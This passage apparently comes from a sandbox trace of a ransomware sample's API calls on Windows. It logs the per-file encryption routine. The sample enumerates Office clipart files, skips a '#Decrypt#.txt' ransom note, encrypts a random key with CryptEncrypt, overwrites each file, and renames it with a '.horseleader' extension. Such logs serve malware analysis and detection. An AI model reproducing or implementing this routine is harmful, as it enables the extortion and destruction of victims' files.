(lpFirst="BL00252_.WMF", lpSrch=".txt") returned 0x0 [0253.466] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4708) returned 1 [0253.466] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1264, lpOverlapped=0x0) returned 1 [0253.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffed9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.468] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1264, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1264, lpOverlapped=0x0) returned 1 [0253.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.468] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 
[0253.469] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.469] CloseHandle (hObject=0x158) returned 1 [0253.469] GetProcessHeap () returned 0x780000 [0253.469] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.469] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.horseleader") returned 79 [0253.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.horseleader")) returned 1 [0253.470] GetProcessHeap () returned 0x780000 [0253.470] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.470] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9e7400, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7c9e7400, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00254_.WMF", cAlternateFileName="")) returned 1 [0253.470] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="Windows") returned -1 [0253.470] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 67 [0253.470] StrStrIW 
(lpFirst="BL00254_.WMF", lpSrch=".horseleader") returned 0x0 [0253.470] lstrcmpW (lpString1="BL00254_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.470] lstrcmpW (lpString1="BL00254_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.470] lstrlenW (lpString=".testttjffg") returned 11 [0253.470] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.470] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.470] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 67 [0253.472] StrStrW (lpFirst="BL00254_.WMF", lpSrch=".txt") returned 0x0 [0253.472] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1736) returned 1 [0253.472] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x6c8, lpOverlapped=0x0) returned 1 [0253.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.474] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x6c8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x6c8, lpOverlapped=0x0) returned 1 [0253.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.474] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.475] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.475] CloseHandle (hObject=0x158) returned 1 [0253.475] GetProcessHeap () returned 0x780000 [0253.475] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.475] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.horseleader") returned 79 [0253.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf.horseleader")) returned 1 [0253.476] GetProcessHeap () returned 0x780000 [0253.476] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.476] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae0bf00, ftCreationTime.dwHighDateTime=0x1bd4b2c, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6ae0bf00, 
ftLastWriteTime.dwHighDateTime=0x1bd4b2c, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00261_.WMF", cAlternateFileName="")) returned 1 [0253.476] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="Windows") returned -1 [0253.476] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 67 [0253.476] StrStrIW (lpFirst="BL00261_.WMF", lpSrch=".horseleader") returned 0x0 [0253.476] lstrcmpW (lpString1="BL00261_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.476] lstrcmpW (lpString1="BL00261_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.476] lstrlenW (lpString=".testttjffg") returned 11 [0253.476] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.476] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.476] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.476] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.477] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 67 [0253.477] StrStrW (lpFirst="BL00261_.WMF", lpSrch=".txt") returned 0x0 [0253.477] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12482) returned 1 [0253.477] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x30c2, lpOverlapped=0x0) returned 1 [0253.480] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcf3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.480] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x30c2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x30c2, lpOverlapped=0x0) returned 1 [0253.480] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.480] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.480] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.481] CloseHandle (hObject=0x158) returned 1 [0253.481] GetProcessHeap () returned 0x780000 [0253.481] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.481] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.horseleader") returned 79 [0253.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.horseleader")) returned 1 [0253.482] GetProcessHeap () 
returned 0x780000 [0253.482] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.482] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63b9b100, ftCreationTime.dwHighDateTime=0x1bd4b2c, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63b9b100, ftLastWriteTime.dwHighDateTime=0x1bd4b2c, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00262_.WMF", cAlternateFileName="")) returned 1 [0253.482] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="Windows") returned -1 [0253.482] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 67 [0253.482] StrStrIW (lpFirst="BL00262_.WMF", lpSrch=".horseleader") returned 0x0 [0253.482] lstrcmpW (lpString1="BL00262_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.482] lstrcmpW (lpString1="BL00262_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.482] lstrlenW (lpString=".testttjffg") returned 11 [0253.482] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.482] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.482] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.484] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 67 [0253.484] StrStrW (lpFirst="BL00262_.WMF", lpSrch=".txt") returned 0x0 [0253.484] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2556) returned 1 [0253.484] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9fc, lpOverlapped=0x0) returned 1 [0253.485] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff604, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.486] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9fc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9fc, lpOverlapped=0x0) returned 1 [0253.486] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.486] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.486] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.486] CloseHandle (hObject=0x158) returned 1 [0253.486] GetProcessHeap () returned 0x780000 [0253.486] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.486] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.horseleader") returned 79 
[0253.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.horseleader")) returned 1 [0253.487] GetProcessHeap () returned 0x780000 [0253.487] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.487] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaca6c00, ftCreationTime.dwHighDateTime=0x1bd4b12, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcaca6c00, ftLastWriteTime.dwHighDateTime=0x1bd4b12, nFileSizeHigh=0x0, nFileSizeLow=0x1678, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00265_.WMF", cAlternateFileName="")) returned 1 [0253.488] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="Windows") returned -1 [0253.488] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 67 [0253.488] StrStrIW (lpFirst="BL00265_.WMF", lpSrch=".horseleader") returned 0x0 [0253.488] lstrcmpW (lpString1="BL00265_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.488] lstrcmpW (lpString1="BL00265_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.488] lstrlenW (lpString=".testttjffg") returned 11 [0253.488] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.488] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.488] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.488] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 67 [0253.489] StrStrW (lpFirst="BL00265_.WMF", lpSrch=".txt") returned 0x0 [0253.489] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5752) returned 1 [0253.489] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1678, lpOverlapped=0x0) returned 1 [0253.491] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe988, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.491] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1678, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1678, lpOverlapped=0x0) returned 1 [0253.492] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.492] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.492] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.492] CloseHandle (hObject=0x158) returned 1 [0253.492] GetProcessHeap () returned 0x780000 [0253.492] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.492] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.horseleader") returned 79 [0253.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.horseleader")) returned 1 [0253.493] GetProcessHeap () returned 0x780000 [0253.494] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.499] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2253700, ftCreationTime.dwHighDateTime=0x1bd4b1a, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2253700, ftLastWriteTime.dwHighDateTime=0x1bd4b1a, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00267_.WMF", cAlternateFileName="")) returned 1 [0253.499] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="Windows") returned -1 [0253.499] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 67 [0253.499] StrStrIW (lpFirst="BL00267_.WMF", lpSrch=".horseleader") returned 0x0 [0253.499] lstrcmpW (lpString1="BL00267_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.499] lstrcmpW 
(lpString1="BL00267_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.499] lstrlenW (lpString=".testttjffg") returned 11 [0253.500] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.500] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.500] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 67 [0253.501] StrStrW (lpFirst="BL00267_.WMF", lpSrch=".txt") returned 0x0 [0253.501] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2644) returned 1 [0253.501] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xa54, lpOverlapped=0x0) returned 1 [0253.502] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff5ac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.503] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xa54, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xa54, lpOverlapped=0x0) returned 1 [0253.503] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0253.503] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.503] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.503] CloseHandle (hObject=0x158) returned 1 [0253.503] GetProcessHeap () returned 0x780000 [0253.503] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.503] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.horseleader") returned 79 [0253.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.horseleader")) returned 1 [0253.505] GetProcessHeap () returned 0x780000 [0253.505] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.505] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 